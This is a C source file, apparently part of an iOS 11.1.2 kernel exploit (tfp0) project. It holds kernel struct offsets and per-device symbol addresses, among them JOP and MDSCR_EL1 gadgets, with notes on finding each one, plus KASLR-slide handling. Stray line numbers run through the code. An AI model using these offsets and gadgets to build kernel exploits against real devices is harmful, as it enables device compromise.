#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/sysctl.h>
#include <sys/utsname.h>

#include "symbols.h"
#include "kmem.h"
#include "kutils.h"
  9.  
  10. // the offsets are unlikely to change between similar models and builds, but the symbol addresses will
  11. // the offsets are required to get the kernel r/w but the symbols aren't
  12.  
// Active kstruct offset table, installed by offsets_init(); NULL until then,
// which koffset() treats as "not initialised".
int* offsets = NULL;
  14.  
  15.  
/*
 * kstruct field offsets for the iOS 11.1.2 kernel (build 15B202).
 *
 * koffset() indexes this array directly with an enum kstruct_offset value
 * (declared outside this file, presumably in symbols.h), so the entry order
 * must match that enum exactly; the trailing comment on each line names the
 * enumerator the entry is meant to sit under. Going by those names the groups
 * are, in order: task, ipc_port, proc, ipc_space, thread, processor, cpu_data.
 * There is no bounds check in koffset(), so adding an enumerator without a
 * matching entry here reads past the end of the table.
 */
int kstruct_offsets_15B202[] = {
    0xb,   // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
    0x10,  // KSTRUCT_OFFSET_TASK_REF_COUNT,
    0x14,  // KSTRUCT_OFFSET_TASK_ACTIVE,
    0x20,  // KSTRUCT_OFFSET_TASK_VM_MAP,
    0x28,  // KSTRUCT_OFFSET_TASK_NEXT,
    0x30,  // KSTRUCT_OFFSET_TASK_PREV,
    0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE
    0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,

    0x0,   // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
    0x4,   // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
    0x40,  // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
    0x50,  // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
    0x60,  // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
    0x68,  // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
    0x90,  // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
    0xa0,  // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,

    0x10,  // KSTRUCT_OFFSET_PROC_PID,

    0x20,  // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE

    0x180, // KSTRUCT_OFFSET_THREAD_BOUND_PROCESSOR
    0x188, // KSTRUCT_OFFSET_THREAD_LAST_PROCESSOR
    0x190, // KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR
    0x408, // KSTRUCT_OFFSET_THREAD_CONTEXT_DATA
    0x410, // KSTRUCT_OFFSET_THREAD_UPCB
    0x418, // KSTRUCT_OFFSET_THREAD_UNEON
    0x420, // KSTRUCT_OFFSET_THREAD_KSTACKPTR

    0x54,  // KSTRUCT_OFFSET_PROCESSOR_CPU_ID

    0x28,  // KSTRUCT_OFFSET_CPU_DATA_EXCEPSTACKPTR
    0X78,  // KSTRUCT_OFFSET_CPU_DATA_CPU_PROCESSOR
};
  53.  
/*
 * Look up a kstruct field offset by its enum index.
 *
 * @param offset  index into the table installed by offsets_init()
 * @return        the offset from the active table, or 0 (with a message on
 *                stdout) when no table has been installed yet
 */
int koffset(enum kstruct_offset offset) {
    // NOTE(review): the initialiser defined in this file is offsets_init();
    // confirm the message below names the call the user is expected to make.
    if (!offsets) {
        printf("need to call symbols_init() prior to querying offsets\n");
        return 0;
    }
    int value = offsets[offset];
    return value;
}
  61.  
// Live (slid) base of the kernel proper, not the kernelcache. Stays 0 until
// ksym() learns it from find_kernel_base() on first use.
uint64_t kernel_base = 0;
// Per-device symbol table chosen by offsets_init(); NULL when none matched.
uint64_t* symbols = NULL;
// Distance between the live kernel base and the static base the symbol tables
// were taken at; ksym() adds it to every table entry.
uint64_t kaslr_slide = 0;
  66.  
/*
 * Static (pre-KASLR) kernel symbol addresses for iPhone 7 (iPhone9,3) on
 * build 15B202. ksym() indexes this array with an enum ksymbol value and adds
 * kaslr_slide, so the entry order must match that enum exactly; each line's
 * trailing comment names the enumerator it is meant to correspond to. Selected
 * by offsets_init() from the uname machine string.
 */
uint64_t ksymbols_iphone_7_15B202[] = {
    0xfffffff0074d74cc, // KSYMBOL_OSARRAY_GET_META_CLASS,
    0xfffffff007566454, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
    0xfffffff007567bfc, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
    0xfffffff0073eb130, // KSYMBOL_CSBLOB_GET_CD_HASH
    0xfffffff007101248, // KSYMBOL_KALLOC_EXTERNAL
    0xfffffff007101278, // KSYMBOL_KFREE
    0xfffffff0074d74d4, // KYSMBOL_RET
    0xfffffff0074f11cc, // KSYMBOL_OSSERIALIZER_SERIALIZE,
    0xfffffff00758c618, // KSYMBOL_KPRINTF
    0xfffffff0074fc164, // KSYMBOL_UUID_COPY
    0xfffffff0075b2000, // KSYMBOL_CPU_DATA_ENTRIES
    0xfffffff0070cc1d4, // KSYMBOL_VALID_LINK_REGISTER
    0xfffffff0070cc1ac, // KSYMBOL_X21_JOP_GADGET
    0xfffffff0070cc474, // KSYMBOL_EXCEPTION_RETURN
    0xfffffff0070cc42c, // KSYMBOL_THREAD_EXCEPTION_RETURN
    0xfffffff0071e1998, // KSYMBOL_SET_MDSCR_EL1_GADGET
    0xfffffff007439b20, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // this is actually 1 instruction in to the entrypoint
    0xfffffff0071de074, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP
    0xfffffff0071dea24, // KSYMBOL_SLEH_SYNC_EPILOG
};
  89.  
/*
 * Static (pre-KASLR) kernel symbol addresses for iPod Touch 6G (iPod7,1) on
 * build 15B202. Same layout contract as the other ksymbols_* tables: indexed
 * by enum ksymbol from ksym(), which adds kaslr_slide, so entry order must
 * match the enum. The trailing comments record the enumerator and the
 * author's notes on where each entry was taken from.
 */
uint64_t ksymbols_ipod_touch_6g_15b202[] = {
    0xFFFFFFF0074A4A4C, // KSYMBOL_OSARRAY_GET_META_CLASS,
    0xFFFFFFF007533CF8, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
    0xFFFFFFF0075354A0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
    0xFFFFFFF0073B71E4, // KSYMBOL_CSBLOB_GET_CD_HASH
    0xFFFFFFF0070C8710, // KSYMBOL_KALLOC_EXTERNAL
    0xFFFFFFF0070C8740, // KSYMBOL_KFREE
    0xFFFFFFF0070C873C, // KYSMBOL_RET
    0xFFFFFFF0074BE978, // KSYMBOL_OSSERIALIZER_SERIALIZE,
    0xFFFFFFF007559FD0, // KSYMBOL_KPRINTF
    0xFFFFFFF0074C9910, // KSYMBOL_UUID_COPY
    0xFFFFFFF00757E000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment
    0xFFFFFFF00709818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1))
    0xFFFFFFF007098164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register)
    0xFFFFFFF007098434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF]
    0xFFFFFFF0070983E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return
    0xFFFFFFF0071AD144, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1
    0xFFFFFFF0074062F4, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
    0xFFFFFFF0071A90C0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
    0xFFFFFFF0071A9ABC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
};
  111.  
/*
 * Static (pre-KASLR) kernel symbol addresses for iPhone 6s (iPhone8,1) on
 * build 15B202. Same layout contract as the other ksymbols_* tables: indexed
 * by enum ksymbol from ksym(), which adds kaslr_slide, so entry order must
 * match the enum. The trailing comments record the enumerator and the
 * author's notes on where each entry was taken from.
 */
uint64_t ksymbols_iphone_6s_15b202[] = {
    0xFFFFFFF00748D548, // KSYMBOL_OSARRAY_GET_META_CLASS,
    0xFFFFFFF00751C4D0, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
    0xFFFFFFF00751DC78, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
    0xFFFFFFF0073A1054, // KSYMBOL_CSBLOB_GET_CD_HASH
    0xFFFFFFF0070B8088, // KSYMBOL_KALLOC_EXTERNAL
    0xFFFFFFF0070B80B8, // KSYMBOL_KFREE
    0xFFFFFFF0070B80B4, // KYSMBOL_RET
    0xFFFFFFF0074A7248, // KSYMBOL_OSSERIALIZER_SERIALIZE,
    0xFFFFFFF0075426C4, // KSYMBOL_KPRINTF
    0xFFFFFFF0074B21E0, // KSYMBOL_UUID_COPY
    0xFFFFFFF007566000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment
    0xFFFFFFF00708818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1))
    0xFFFFFFF007088164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register)
    0xFFFFFFF007088434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF]
    0xFFFFFFF0070883E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return
    0xFFFFFFF007197AB0, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1
    0xFFFFFFF0073EFB44, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
    0xFFFFFFF0071941D8, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
    0xFFFFFFF007194BBC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
};
  133.  
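/*
 * Resolve a kernel symbol to its runtime (slid) address.
 *
 * On first use the live kernel base is learned through find_kernel_base()
 * and kaslr_slide is derived from it; that requires the kernel read primitive,
 * so until have_kmem_read() is true this returns 0. It also returns 0 when
 * offsets_init() selected no symbol table for this device (symbols == NULL)
 * instead of dereferencing the null table, mirroring koffset().
 *
 * @param sym  index into the selected per-device symbol table
 * @return     the slid address, or 0 if the lookup cannot be performed yet
 */
uint64_t ksym(enum ksymbol sym) {
    if (symbols == NULL) {
        printf("attempted to use symbols but no symbol table was selected for this device\n");
        return 0;
    }
    if (kernel_base == 0) {
        if (!have_kmem_read()) {
            printf("attempted to use symbols prior to gaining kernel read\n");
            return 0;
        }
        kernel_base = find_kernel_base();
        // Reuse the cached base rather than calling find_kernel_base() again.
        // The subtracted constant is presumably the static base the ksymbols_*
        // tables were taken at, so the difference is the KASLR slide.
        kaslr_slide = kernel_base - 0xFFFFFFF007004000;
    }
    return symbols[sym] + kaslr_slide;
}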
  146.  
// Set to 1 by offsets_init() once a per-device symbol table has been chosen,
// 0 otherwise.
int have_syms = 0;

/*
 * Report whether offsets_init() found a symbol table for this device/build.
 *
 * @return  non-zero if ksym() lookups are expected to be valid
 */
int probably_have_correct_symbols() {
    const int result = have_syms;
    return result;
}
  151.  
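// Install the kstruct offset table for the reported kernel build.
// Returns 0 when the build is known and -1 when it is not; in the unknown
// case the 15B202 table is still installed, preserving the original
// "try anyway" policy, and the caller is responsible for have_syms.
static int select_offsets_for_build(const char *build_id) {
    if (strcmp(build_id, "15B202") == 0) {
        offsets = kstruct_offsets_15B202;
        return 0;
    }
    offsets = kstruct_offsets_15B202;
    printf("unknown kernel build. If this is iOS 11 it might still be able to get tfp0, trying anyway\n");
    return -1;
}

// Install the per-device symbol table matching the uname machine string and
// record in have_syms whether one was found.
static void select_symbols_for_machine(const char *machine) {
    if (strstr(machine, "iPod7,1")) {
        printf("this is iPod Touch 6G, should work!\n");
        symbols = ksymbols_ipod_touch_6g_15b202;
        have_syms = 1;
    } else if (strstr(machine, "iPhone9,3")) {
        printf("this is iPhone 7, should work!\n");
        symbols = ksymbols_iphone_7_15B202;
        have_syms = 1;
    } else if (strstr(machine, "iPhone8,1")) {
        printf("this is iPhone 6s, should work!\n");
        symbols = ksymbols_iphone_6s_15b202;
        have_syms = 1;
    } else {
        printf("no symbols for this device yet\n");
        printf("tfp0 should still work, but the kernel debugger PoC won't\n");
        symbols = NULL;
        have_syms = 0;
    }
}

/*
 * Detect the running kernel build and device model and install the matching
 * offset and symbol tables (globals offsets, symbols and have_syms).
 *
 * The build is read from kern.osversion via sysctlbyname() and the device
 * from uname()'s machine string. If sysctlbyname() fails nothing is
 * installed. If the build is not recognised the 15B202 offsets are installed
 * anyway, no symbol table is selected and have_syms stays 0, so callers
 * should consult probably_have_correct_symbols() before trusting ksym().
 */
void offsets_init(void) {
    // Request one byte less than the buffer holds so build_id stays
    // NUL-terminated even if sysctl fills the entire requested length.
    char build_id[32] = {0};
    size_t size = sizeof build_id - 1;
    int err = sysctlbyname("kern.osversion", build_id, &size, NULL, 0);
    if (err == -1) {
        printf("failed to detect version (sysctlbyname failed)\n");
        return;
    }
    printf("build_id: %s\n", build_id);

    // The struct is zeroed first so that a failed uname() still leaves
    // terminated (empty) strings below; detection then falls through to the
    // "no symbols" branch rather than aborting, as before.
    struct utsname u = {0};
    if (uname(&u) != 0) {
        printf("uname failed, device detection will not work\n");
    }

    printf("sysname: %s\n", u.sysname);
    printf("nodename: %s\n", u.nodename);
    printf("release: %s\n", u.release);
    printf("version: %s\n", u.version);
    printf("machine: %s\n", u.machine);

    // set the offsets
    if (select_offsets_for_build(build_id) != 0) {
        have_syms = 0;
        return;
    }

    // set the symbols
    select_symbols_for_machine(u.machine);
}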